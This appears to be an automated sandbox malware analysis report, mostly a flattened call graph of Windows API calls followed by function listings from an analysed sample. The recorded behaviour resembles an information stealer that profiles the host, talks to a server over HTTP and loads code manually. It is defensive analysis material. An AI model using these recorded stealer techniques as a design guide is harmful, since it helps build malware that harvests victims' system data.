e1b96 14998->14999 15000 ea920 3 API calls 14999->15000 15001 e1ba9 15000->15001 15002 ea8a0 lstrcpy 15001->15002 15003 e1bb2 15002->15003 15004 ea9b0 4 API calls 15003->15004 15005 e1bdc 15004->15005 15006 ea8a0 lstrcpy 15005->15006 15007 e1be5 15006->15007 15008 ea9b0 4 API calls 15007->15008 15009 e1c05 15008->15009 15010 ea8a0 lstrcpy 15009->15010 15011 e1c0e 15010->15011 15717 e7690 GetProcessHeap RtlAllocateHeap 15011->15717 15014 ea9b0 4 API calls 15015 e1c2e 15014->15015 15016 ea8a0 lstrcpy 15015->15016 15017 e1c37 15016->15017 15018 ea9b0 4 API calls 15017->15018 15019 e1c56 15018->15019 15020 ea8a0 lstrcpy 15019->15020 15021 e1c5f 15020->15021 15022 ea9b0 4 API calls 15021->15022 15023 e1c80 15022->15023 15024 ea8a0 lstrcpy 15023->15024 15025 e1c89 15024->15025 15724 e77c0 GetCurrentProcess IsWow64Process 15025->15724 15028 ea9b0 4 API calls 15029 e1ca9 15028->15029 15030 ea8a0 lstrcpy 15029->15030 15031 e1cb2 15030->15031 15032 ea9b0 4 API calls 15031->15032 15033 e1cd1 15032->15033 15034 ea8a0 lstrcpy 15033->15034 15035 e1cda 15034->15035 15036 ea9b0 4 API calls 15035->15036 15037 e1cfb 15036->15037 15038 ea8a0 lstrcpy 15037->15038 15039 e1d04 15038->15039 15040 e7850 3 API calls 15039->15040 15041 e1d14 15040->15041 15042 ea9b0 4 API calls 15041->15042 15043 e1d24 15042->15043 15044 ea8a0 lstrcpy 15043->15044 15045 e1d2d 15044->15045 15046 ea9b0 4 API calls 15045->15046 15047 e1d4c 15046->15047 15048 ea8a0 lstrcpy 15047->15048 15049 e1d55 15048->15049 15050 ea9b0 4 API calls 15049->15050 15051 e1d75 15050->15051 15052 ea8a0 lstrcpy 15051->15052 15053 e1d7e 15052->15053 15054 e78e0 3 API calls 15053->15054 15055 e1d8e 15054->15055 15056 ea9b0 4 API calls 15055->15056 15057 e1d9e 15056->15057 15058 ea8a0 lstrcpy 15057->15058 15059 e1da7 15058->15059 15060 ea9b0 4 API calls 15059->15060 15061 e1dc6 15060->15061 15062 ea8a0 lstrcpy 15061->15062 15063 e1dcf 15062->15063 15064 ea9b0 4 API calls 15063->15064 15065 e1df0 15064->15065 15066 ea8a0 lstrcpy 15065->15066 15067 e1df9 15066->15067 15726 e7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15067->15726 15070 ea9b0 4 API calls 15071 e1e19 15070->15071 15072 ea8a0 lstrcpy 15071->15072 15073 e1e22 15072->15073 15074 ea9b0 4 API calls 15073->15074 15075 e1e41 15074->15075 15076 ea8a0 lstrcpy 15075->15076 15077 e1e4a 15076->15077 15078 ea9b0 4 API calls 15077->15078 15079 e1e6b 15078->15079 15080 ea8a0 lstrcpy 15079->15080 15081 e1e74 15080->15081 15728 e7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15081->15728 15084 ea9b0 4 API calls 15085 e1e94 15084->15085 15086 ea8a0 lstrcpy 15085->15086 15087 e1e9d 15086->15087 15088 ea9b0 4 API calls 15087->15088 15089 e1ebc 15088->15089 15090 ea8a0 lstrcpy 15089->15090 15091 e1ec5 15090->15091 15092 ea9b0 4 API calls 15091->15092 15093 e1ee5 15092->15093 15094 ea8a0 lstrcpy 15093->15094 15095 e1eee 15094->15095 15731 e7b00 GetUserDefaultLocaleName 15095->15731 15098 ea9b0 4 API calls 15099 e1f0e 15098->15099 15100 ea8a0 lstrcpy 15099->15100 15101 e1f17 15100->15101 15102 ea9b0 4 API calls 15101->15102 15103 e1f36 15102->15103 15104 ea8a0 lstrcpy 15103->15104 15105 e1f3f 15104->15105 15106 ea9b0 4 API calls 15105->15106 15107 e1f60 15106->15107 15108 ea8a0 lstrcpy 15107->15108 15109 e1f69 15108->15109 15735 e7b90 15109->15735 15111 e1f80 15112 ea920 3 API calls 15111->15112 15113 e1f93 15112->15113 15114 ea8a0 lstrcpy 15113->15114 15115 e1f9c 15114->15115 15116 ea9b0 4 API calls 15115->15116 15117 e1fc6 15116->15117 15118 ea8a0 lstrcpy 15117->15118 15119 e1fcf 15118->15119 15120 ea9b0 4 API calls 15119->15120 15121 e1fef 15120->15121 15122 ea8a0 lstrcpy 15121->15122 15123 e1ff8 15122->15123 15747 e7d80 GetSystemPowerStatus 15123->15747 15126 ea9b0 4 API calls 15127 e2018 15126->15127 15128 ea8a0 lstrcpy 15127->15128 15129 e2021 15128->15129 15130 ea9b0 4 API calls 15129->15130 15131 e2040 15130->15131 15132 ea8a0 lstrcpy 15131->15132 15133 e2049 15132->15133 15134 ea9b0 4 API calls 15133->15134 15135 e206a 15134->15135 15136 ea8a0 lstrcpy 15135->15136 15137 e2073 15136->15137 15138 e207e GetCurrentProcessId 15137->15138 15749 e9470 OpenProcess 15138->15749 15141 ea920 3 API calls 15142 e20a4 15141->15142 15143 ea8a0 lstrcpy 15142->15143 15144 e20ad 15143->15144 15145 ea9b0 4 API calls 15144->15145 15146 e20d7 15145->15146 15147 ea8a0 lstrcpy 15146->15147 15148 e20e0 15147->15148 15149 ea9b0 4 API calls 15148->15149 15150 e2100 15149->15150 15151 ea8a0 lstrcpy 15150->15151 15152 e2109 15151->15152 15754 e7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15152->15754 15155 ea9b0 4 API calls 15156 e2129 15155->15156 15157 ea8a0 lstrcpy 15156->15157 15158 e2132 15157->15158 15159 ea9b0 4 API calls 15158->15159 15160 e2151 15159->15160 15161 ea8a0 lstrcpy 15160->15161 15162 e215a 15161->15162 15163 ea9b0 4 API calls 15162->15163 15164 e217b 15163->15164 15165 ea8a0 lstrcpy 15164->15165 15166 e2184 15165->15166 15758 e7f60 15166->15758 15169 ea9b0 4 API calls 15170 e21a4 15169->15170 15171 ea8a0 lstrcpy 15170->15171 15172 e21ad 15171->15172 15173 ea9b0 4 API calls 15172->15173 15174 e21cc 15173->15174 15175 ea8a0 lstrcpy 15174->15175 15176 e21d5 15175->15176 15177 ea9b0 4 API calls 15176->15177 15178 e21f6 15177->15178 15179 ea8a0 lstrcpy 15178->15179 15180 e21ff 15179->15180 15771 e7ed0 GetSystemInfo wsprintfA 15180->15771 15183 ea9b0 4 API calls 15184 e221f 15183->15184 15185 ea8a0 lstrcpy 15184->15185 15186 e2228 15185->15186 15187 ea9b0 4 API calls 15186->15187 15188 e2247 15187->15188 15189 ea8a0 lstrcpy 15188->15189 15190 e2250 15189->15190 15191 ea9b0 4 API calls 15190->15191 15192 e2270 15191->15192 15193 ea8a0 lstrcpy 15192->15193 15194 e2279 15193->15194 15773 e8100 GetProcessHeap RtlAllocateHeap 15194->15773 15197 ea9b0 4 API calls 15198 e2299 15197->15198 15199 ea8a0 lstrcpy 15198->15199 15200 e22a2 15199->15200 15201 ea9b0 4 API calls 15200->15201 15202 e22c1 15201->15202 15203 ea8a0 lstrcpy 15202->15203 15204 e22ca 15203->15204 15205 ea9b0 4 API calls 15204->15205 15206 e22eb 15205->15206 15207 ea8a0 lstrcpy 15206->15207 15208 e22f4 15207->15208 15779 e87c0 15208->15779 15211 ea920 3 API calls 15212 e231e 15211->15212 15213 ea8a0 lstrcpy 15212->15213 15214 e2327 15213->15214 15215 ea9b0 4 API calls 15214->15215 15216 e2351 15215->15216 15217 ea8a0 lstrcpy 15216->15217 15218 e235a 15217->15218 15219 ea9b0 4 API calls 15218->15219 15220 e237a 15219->15220 15221 ea8a0 lstrcpy 15220->15221 15222 e2383 15221->15222 15223 ea9b0 4 API calls 15222->15223 15224 e23a2 15223->15224 15225 ea8a0 lstrcpy 15224->15225 15226 e23ab 15225->15226 15784 e81f0 15226->15784 15228 e23c2 15229 ea920 3 API calls 15228->15229 15230 e23d5 15229->15230 15231 ea8a0 lstrcpy 15230->15231 15232 e23de 15231->15232 15233 ea9b0 4 API calls 15232->15233 15234 e240a 15233->15234 15235 ea8a0 lstrcpy 15234->15235 15236 e2413 15235->15236 15237 ea9b0 4 API calls 15236->15237 15238 e2432 15237->15238 15239 ea8a0 lstrcpy 15238->15239 15240 e243b 15239->15240 15241 ea9b0 4 API calls 15240->15241 15242 e245c 15241->15242 15243 ea8a0 lstrcpy 15242->15243 15244 e2465 15243->15244 15245 ea9b0 4 API calls 15244->15245 15246 e2484 15245->15246 15247 ea8a0 lstrcpy 15246->15247 15248 e248d 15247->15248 15249 ea9b0 4 API calls 15248->15249 15250 e24ae 15249->15250 15251 ea8a0 lstrcpy 15250->15251 15252 e24b7 15251->15252 15792 e8320 15252->15792 15254 e24d3 15255 ea920 3 API calls 15254->15255 15256 e24e6 15255->15256 15257 ea8a0 lstrcpy 15256->15257 15258 e24ef 15257->15258 15259 ea9b0 4 API calls 15258->15259 15260 e2519 15259->15260 15261 ea8a0 lstrcpy 15260->15261 15262 e2522 15261->15262 15263 ea9b0 4 API calls 15262->15263 15264 e2543 15263->15264 15265 ea8a0 lstrcpy 15264->15265 15266 e254c 15265->15266 15267 e8320 17 API calls 15266->15267 15268 e2568 15267->15268 15269 ea920 3 API calls 15268->15269 15270 e257b 15269->15270 15271 ea8a0 lstrcpy 15270->15271 15272 e2584 15271->15272 15273 ea9b0 4 API calls 15272->15273 15274 e25ae 15273->15274 15275 ea8a0 lstrcpy 15274->15275 15276 e25b7 15275->15276 15277 ea9b0 4 API calls 15276->15277 15278 e25d6 15277->15278 15279 ea8a0 lstrcpy 15278->15279 15280 e25df 15279->15280 15281 ea9b0 4 API calls 15280->15281 15282 e2600 15281->15282 15283 ea8a0 lstrcpy 15282->15283 15284 e2609 15283->15284 15828 e8680 15284->15828 15286 e2620 15287 ea920 3 API calls 15286->15287 15288 e2633 15287->15288 15289 ea8a0 lstrcpy 15288->15289 15290 e263c 15289->15290 15291 e265a lstrlen 15290->15291 15292 e266a 15291->15292 15293 ea740 lstrcpy 15292->15293 15294 e267c 15293->15294 15295 d1590 lstrcpy 15294->15295 15296 e268d 15295->15296 15838 e5190 15296->15838 15298 e2699 15298->13730 16026 eaad0 15299->16026 15301 d5009 InternetOpenUrlA 15305 d5021 15301->15305 15302 d502a InternetReadFile 15302->15305 15303 d50a0 InternetCloseHandle InternetCloseHandle 15304 d50ec 15303->15304 15304->13734 15305->15302 15305->15303 16027 d98d0 15306->16027 15308 e0759 15309 e077d 15308->15309 15310 e0a38 15308->15310 15312 e0799 StrCmpCA 15309->15312 15311 d1590 lstrcpy 15310->15311 15313 e0a49 15311->15313 15315 e07a8 15312->15315 15341 e0843 15312->15341 16203 e0250 15313->16203 15317 ea7a0 lstrcpy 15315->15317 15319 e07c3 15317->15319 15318 e0865 StrCmpCA 15320 e0874 15318->15320 15358 e096b 15318->15358 15321 d1590 lstrcpy 15319->15321 15322 ea740 lstrcpy 15320->15322 15323 e080c 15321->15323 15325 e0881 15322->15325 15326 ea7a0 lstrcpy 15323->15326 15324 e099c StrCmpCA 15327 e09ab 15324->15327 15347 e0a2d 15324->15347 15328 ea9b0 4 API calls 15325->15328 15329 e0823 15326->15329 15330 d1590 lstrcpy 15327->15330 15331 e08ac 15328->15331 15332 ea7a0 lstrcpy 15329->15332 15333 e09f4 15330->15333 15334 ea920 3 API calls 15331->15334 15335 e083e 15332->15335 15336 ea7a0 lstrcpy 15333->15336 15337 e08b3 15334->15337 16030 dfb00 15335->16030 15339 e0a0d 15336->15339 15340 ea9b0 4 API calls 15337->15340 15342 ea7a0 lstrcpy 15339->15342 15343 e08ba 15340->15343 15341->15318 15344 e0a28 15342->15344 16146 e0030 15344->16146 15347->13738 15358->15324 15678 ea7a0 lstrcpy 15677->15678 15679 d1683 15678->15679 15680 ea7a0 lstrcpy 15679->15680 15681 d1695 15680->15681 15682 ea7a0 lstrcpy 15681->15682 15683 d16a7 15682->15683 15684 ea7a0 lstrcpy 15683->15684 15685 d15a3 15684->15685 15685->14561 15687 d47c6 15686->15687 15688 d4838 lstrlen 15687->15688 15712 eaad0 15688->15712 15690 d4848 InternetCrackUrlA 15691 d4867 15690->15691 15691->14638 15693 ea740 lstrcpy 15692->15693 15694 e8b74 15693->15694 15695 ea740 lstrcpy 15694->15695 15696 e8b82 GetSystemTime 15695->15696 15697 e8b99 15696->15697 15698 ea7a0 lstrcpy 15697->15698 15699 e8bfc 15698->15699 15699->14653 15701 ea931 15700->15701 15702 ea988 15701->15702 15704 ea968 lstrcpy lstrcat 15701->15704 15703 ea7a0 lstrcpy 15702->15703 15705 ea994 15703->15705 15704->15702 15705->14656 15706->14771 15708 d9af9 LocalAlloc 15707->15708 15709 d4eee 15707->15709 15708->15709 15710 d9b14 CryptStringToBinaryA 15708->15710 15709->14659 15709->14662 15710->15709 15711 d9b39 LocalFree 15710->15711 15711->15709 15712->15690 15713->14781 15714->14922 15715->14924 15716->14932 15845 e77a0 15717->15845 15720 e1c1e 15720->15014 15721 e76c6 RegOpenKeyExA 15722 e76e7 RegQueryValueExA 15721->15722 15723 e7704 RegCloseKey 15721->15723 15722->15723 15723->15720 15725 e1c99 15724->15725 15725->15028 15727 e1e09 15726->15727 15727->15070 15729 e7a9a wsprintfA 15728->15729 15730 e1e84 15728->15730 15729->15730 15730->15084 15732 e7b4d 15731->15732 15733 e1efe 15731->15733 15852 e8d20 LocalAlloc CharToOemW 15732->15852 15733->15098 15736 ea740 lstrcpy 15735->15736 15737 e7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15736->15737 15746 e7c25 15737->15746 15738 e7d18 15740 e7d1e LocalFree 15738->15740 15741 e7d28 15738->15741 15739 e7c46 GetLocaleInfoA 15739->15746 15740->15741 15742 ea7a0 lstrcpy 15741->15742 15745 e7d37 15742->15745 15743 ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15743->15746 15744 ea8a0 lstrcpy 15744->15746 15745->15111 15746->15738 15746->15739 15746->15743 15746->15744 15748 e2008 15747->15748 15748->15126 15750 e94b5 15749->15750 15751 e9493 GetModuleFileNameExA CloseHandle 15749->15751 15752 ea740 lstrcpy 15750->15752 15751->15750 15753 e2091 15752->15753 15753->15141 15755 e7e68 RegQueryValueExA 15754->15755 15756 e2119 15754->15756 15757 e7e8e RegCloseKey 15755->15757 15756->15155 15757->15756 15759 e7fb9 GetLogicalProcessorInformationEx 15758->15759 15760 e7fd8 GetLastError 15759->15760 15761 e8029 15759->15761 15763 e8022 15760->15763 15770 e7fe3 15760->15770 15766 e89f0 2 API calls 15761->15766 15762 e2194 15762->15169 15763->15762 15767 e89f0 2 API calls 15763->15767 15768 e807b 15766->15768 15767->15762 15768->15763 15769 e8084 wsprintfA 15768->15769 15769->15762 15770->15759 15770->15762 15853 e89f0 15770->15853 15856 e8a10 GetProcessHeap RtlAllocateHeap 15770->15856 15772 e220f 15771->15772 15772->15183 15774 e89b0 15773->15774 15775 e814d GlobalMemoryStatusEx 15774->15775 15777 e8163 __aulldiv 15775->15777 15776 e819b wsprintfA 15778 e2289 15776->15778 15777->15776 15778->15197 15780 e87fb GetProcessHeap RtlAllocateHeap wsprintfA 15779->15780 15782 ea740 lstrcpy 15780->15782 15783 e230b 15782->15783 15783->15211 15785 ea740 lstrcpy 15784->15785 15791 e8229 15785->15791 15786 e8263 15788 ea7a0 lstrcpy 15786->15788 15787 ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15787->15791 15789 e82dc 15788->15789 15789->15228 15790 ea8a0 lstrcpy 15790->15791 15791->15786 15791->15787 15791->15790 15793 ea740 lstrcpy 15792->15793 15794 e835c RegOpenKeyExA 15793->15794 15795 e83ae 15794->15795 15796 e83d0 15794->15796 15797 ea7a0 lstrcpy 15795->15797 15798 e83f8 RegEnumKeyExA 15796->15798 15799 e8613 RegCloseKey 15796->15799 15808 e83bd 15797->15808 15800 e860e 15798->15800 15801 e843f wsprintfA RegOpenKeyExA 15798->15801 15802 ea7a0 lstrcpy 15799->15802 15800->15799 15803 e8485 RegCloseKey RegCloseKey 15801->15803 15804 e84c1 RegQueryValueExA 15801->15804 15802->15808 15805 ea7a0 lstrcpy 15803->15805 15806 e84fa lstrlen 15804->15806 15807 e8601 RegCloseKey 15804->15807 15805->15808 15806->15807 15809 e8510 15806->15809 15807->15800 15808->15254 15810 ea9b0 4 API calls 15809->15810 15811 e8527 15810->15811 15812 ea8a0 lstrcpy 15811->15812 15813 e8533 15812->15813 15814 ea9b0 4 API calls 15813->15814 15815 e8557 15814->15815 15816 ea8a0 lstrcpy 15815->15816 15817 e8563 15816->15817 15818 e856e RegQueryValueExA 15817->15818 15818->15807 15819 e85a3 15818->15819 15820 ea9b0 4 API calls 15819->15820 15821 e85ba 15820->15821 15822 ea8a0 lstrcpy 15821->15822 15823 e85c6 15822->15823 15824 ea9b0 4 API calls 15823->15824 15825 e85ea 15824->15825 15826 ea8a0 lstrcpy 15825->15826 15827 e85f6 15826->15827 15827->15807 15829 ea740 lstrcpy 15828->15829 15830 e86bc CreateToolhelp32Snapshot Process32First 15829->15830 15831 e875d CloseHandle 15830->15831 15832 e86e8 Process32Next 15830->15832 15833 ea7a0 lstrcpy 15831->15833 15832->15831 15837 e86fd 15832->15837 15835 e8776 15833->15835 15834 ea8a0 lstrcpy 15834->15837 15835->15286 15836 ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15836->15837 15837->15832 15837->15834 15837->15836 15839 ea7a0 lstrcpy 15838->15839 15840 e51b5 15839->15840 15841 d1590 lstrcpy 15840->15841 15842 e51c6 15841->15842 15857 d5100 15842->15857 15844 e51cf 15844->15298 15848 e7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15845->15848 15847 e76b9 15847->15720 15847->15721 15849 e7765 RegQueryValueExA 15848->15849 15850 e7780 RegCloseKey 15848->15850 15849->15850 15851 e7793 15850->15851 15851->15847 15852->15733 15854 e8a0c 15853->15854 15855 e89f9 GetProcessHeap HeapFree 15853->15855 15854->15770 15855->15854 15856->15770 15858 ea7a0 lstrcpy 15857->15858 15859 d5119 15858->15859 15860 d47b0 2 API calls 15859->15860 15861 d5125 15860->15861 16017 e8ea0 15861->16017 15863 d5184 15864 d5192 lstrlen 15863->15864 15865 d51a5 15864->15865 15866 e8ea0 4 API calls 15865->15866 15867 d51b6 15866->15867 15868 ea740 lstrcpy 15867->15868 15869 d51c9 15868->15869 15870 ea740 lstrcpy 15869->15870 15871 d51d6 15870->15871 15872 ea740 lstrcpy 15871->15872 15873 d51e3 15872->15873 15874 ea740 lstrcpy 15873->15874 15875 d51f0 15874->15875 15876 ea740 lstrcpy 15875->15876 15877 d51fd InternetOpenA StrCmpCA 15876->15877 15878 d522f 15877->15878 15879 d58c4 InternetCloseHandle 15878->15879 15880 e8b60 3 API calls 15878->15880 15886 d58d9 ctype 15879->15886 15881 d524e 15880->15881 15882 ea920 3 API calls 15881->15882 15883 d5261 15882->15883 15884 ea8a0 lstrcpy 15883->15884 15885 d526a 15884->15885 15887 ea9b0 4 API calls 15885->15887 15890 ea7a0 lstrcpy 15886->15890 15888 d52ab 15887->15888 15889 ea920 3 API calls 15888->15889 15891 d52b2 15889->15891 15897 d5913 15890->15897 15892 ea9b0 4 API calls 15891->15892 15893 d52b9 15892->15893 15894 ea8a0 lstrcpy 15893->15894 15895 d52c2 15894->15895 15896 ea9b0 4 API calls 15895->15896 15898 d5303 15896->15898 15897->15844 15899 ea920 3 API calls 15898->15899 15900 d530a 15899->15900 15901 ea8a0 lstrcpy 15900->15901 15902 d5313 15901->15902 15903 d5329 InternetConnectA 15902->15903 15903->15879 15904 d5359 HttpOpenRequestA 15903->15904 15906 d58b7 InternetCloseHandle 15904->15906 15907 d53b7 15904->15907 15906->15879 15908 ea9b0 4 API calls 15907->15908 15909 d53cb 15908->15909 15910 ea8a0 lstrcpy 15909->15910 15911 d53d4 15910->15911 15912 ea920 3 API calls 15911->15912 15913 d53f2 15912->15913 15914 ea8a0 lstrcpy 15913->15914 15915 d53fb 15914->15915 15916 ea9b0 4 API calls 15915->15916 15917 d541a 15916->15917 15918 ea8a0 lstrcpy 15917->15918 15919 d5423 15918->15919 15920 ea9b0 4 API calls 15919->15920 15921 d5444 15920->15921 15922 ea8a0 lstrcpy 15921->15922 15923 d544d 15922->15923 15924 ea9b0 4 API calls 15923->15924 15925 d546e 15924->15925 15926 ea8a0 lstrcpy 15925->15926 16018 e8ead CryptBinaryToStringA 16017->16018 16019 e8ea9 16017->16019 16018->16019 16020 e8ece GetProcessHeap RtlAllocateHeap 16018->16020 16019->15863 16020->16019 16021 e8ef4 ctype 16020->16021 16022 e8f05 CryptBinaryToStringA 16021->16022 16022->16019 16026->15301 16269 d9880 16027->16269 16029 d98e1 16029->15308 16031 ea740 lstrcpy 16030->16031 16204 ea740 lstrcpy 16203->16204 16205 e0266 16204->16205 16206 e8de0 2 API calls 16205->16206 16207 e027b 16206->16207 16208 ea920 3 API calls 16207->16208 16209 e028b 16208->16209 16210 ea8a0 lstrcpy 16209->16210 16211 e0294 16210->16211 16212 ea9b0 4 API calls 16211->16212 16213 e02b8 16212->16213 16270 d988e 16269->16270 16273 d6fb0 16270->16273 16272 d98ad ctype 16272->16029 16276 d6d40 16273->16276 16277 d6d63 16276->16277 16287 d6d59 16276->16287 16292 d6530 16277->16292 16281 d6dbe 16281->16287 16302 d69b0 16281->16302 16283 d6e2a 16284 d6ee6 VirtualFree 16283->16284 16286 d6ef7 16283->16286 16283->16287 16284->16286 16285 d6f41 16285->16287 16290 e89f0 2 API calls 16285->16290 16286->16285 16288 d6f38 16286->16288 16289 d6f26 FreeLibrary 16286->16289 16287->16272 16291 e89f0 2 API calls 16288->16291 16289->16286 16290->16287 16291->16285 16293 d6542 16292->16293 16295 d6549 16293->16295 16312 e8a10 GetProcessHeap RtlAllocateHeap 16293->16312 16295->16287 16296 d6660 16295->16296 16301 d668f VirtualAlloc 16296->16301 16298 d673c 16298->16281 16299 d6730 16299->16298 16300 d6743 VirtualAlloc 16299->16300 16300->16298 16301->16298 16301->16299 16303 d69c9 16302->16303 16308 d69d5 16302->16308 16304 d6a09 LoadLibraryA 16303->16304 16303->16308 16305 d6a32 16304->16305 16304->16308 16311 d6ae0 16305->16311 16313 e8a10 GetProcessHeap RtlAllocateHeap 16305->16313 16307 d6ba8 GetProcAddress 16307->16308 16307->16311 16308->16283 16309 e89f0 2 API calls 16309->16311 16310 d6a8b 16310->16308 16310->16309 16311->16307 16311->16308 16312->16295 16313->16310

                                    Executed Functions

                                    Function 000E9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 e9860-e9874 call e9750 663 e987a-e9a8e call e9780 GetProcAddress * 21 660->663 664 e9a93-e9af2 LoadLibraryA * 5 660->664 663->664 666 e9b0d-e9b14 664->666 667 e9af4-e9b08 GetProcAddress 664->667 669 e9b46-e9b4d 666->669 670 e9b16-e9b41 GetProcAddress * 2 666->670 667->666 671 e9b4f-e9b63 GetProcAddress 669->671 672 e9b68-e9b6f 669->672 670->669 671->672 673 e9b89-e9b90 672->673 674 e9b71-e9b84 GetProcAddress 672->674 675 e9b92-e9bbc GetProcAddress * 2 673->675 676 e9bc1-e9bc2 673->676 674->673 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(76210000,00B68A60), ref: 000E98A1
                                    • GetProcAddress.KERNEL32(76210000,00B68970), ref: 000E98BA
                                    • GetProcAddress.KERNEL32(76210000,00B689A0), ref: 000E98D2
                                    • GetProcAddress.KERNEL32(76210000,00B68A18), ref: 000E98EA
                                    • GetProcAddress.KERNEL32(76210000,00B688F8), ref: 000E9903
                                    • GetProcAddress.KERNEL32(76210000,00B79278), ref: 000E991B
                                    • GetProcAddress.KERNEL32(76210000,00B65068), ref: 000E9933
                                    • GetProcAddress.KERNEL32(76210000,00B651C8), ref: 000E994C
                                    • GetProcAddress.KERNEL32(76210000,00B68988), ref: 000E9964
                                    • GetProcAddress.KERNEL32(76210000,00B68B20), ref: 000E997C
                                    • GetProcAddress.KERNEL32(76210000,00B68850), ref: 000E9995
                                    • GetProcAddress.KERNEL32(76210000,00B688E0), ref: 000E99AD
                                    • GetProcAddress.KERNEL32(76210000,00B651A8), ref: 000E99C5
                                    • GetProcAddress.KERNEL32(76210000,00B68868), ref: 000E99DE
                                    • GetProcAddress.KERNEL32(76210000,00B68A90), ref: 000E99F6
                                    • GetProcAddress.KERNEL32(76210000,00B65308), ref: 000E9A0E
                                    • GetProcAddress.KERNEL32(76210000,00B68928), ref: 000E9A27
                                    • GetProcAddress.KERNEL32(76210000,00B68940), ref: 000E9A3F
                                    • GetProcAddress.KERNEL32(76210000,00B65208), ref: 000E9A57
                                    • GetProcAddress.KERNEL32(76210000,00B689B8), ref: 000E9A70
                                    • GetProcAddress.KERNEL32(76210000,00B650A8), ref: 000E9A88
                                    • LoadLibraryA.KERNEL32(00B688B0,?,000E6A00), ref: 000E9A9A
                                    • LoadLibraryA.KERNEL32(00B689D0,?,000E6A00), ref: 000E9AAB
                                    • LoadLibraryA.KERNEL32(00B688C8,?,000E6A00), ref: 000E9ABD
                                    • LoadLibraryA.KERNEL32(00B689E8,?,000E6A00), ref: 000E9ACF
                                    • LoadLibraryA.KERNEL32(00B68AA8,?,000E6A00), ref: 000E9AE0
                                    • GetProcAddress.KERNEL32(75B30000,00B68AC0), ref: 000E9B02
                                    • GetProcAddress.KERNEL32(751E0000,00B68AD8), ref: 000E9B23
                                    • GetProcAddress.KERNEL32(751E0000,00B68BF8), ref: 000E9B3B
                                    • GetProcAddress.KERNEL32(76910000,00B68BB0), ref: 000E9B5D
                                    • GetProcAddress.KERNEL32(75670000,00B65108), ref: 000E9B7E
                                    • GetProcAddress.KERNEL32(77310000,00B79208), ref: 000E9B9F
                                    • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 000E9BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 000E9BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 2e9aea6f92bab1216cb530423830ecaf2f7d420328039d375cde5b4954bd7c96
                                    • Instruction ID: 56ed66a7498a64a07befe17c292bc32dc3182107f77f97c765b3f5cd36f0319f
                                    • Opcode Fuzzy Hash: 2e9aea6f92bab1216cb530423830ecaf2f7d420328039d375cde5b4954bd7c96
                                    • Instruction Fuzzy Hash: DBA17CB5502A409FD346EFA8EE889E23BFDF74C313F04C51AA619832A5D7399542DB12
                                    Function 000D45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 677 d45c0-d4695 RtlAllocateHeap 694 d46a0-d46a6 677->694 695 d46ac-d474a 694->695 696 d474f-d47a9 VirtualProtect 694->696 695->694
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D460E
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000D479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4657
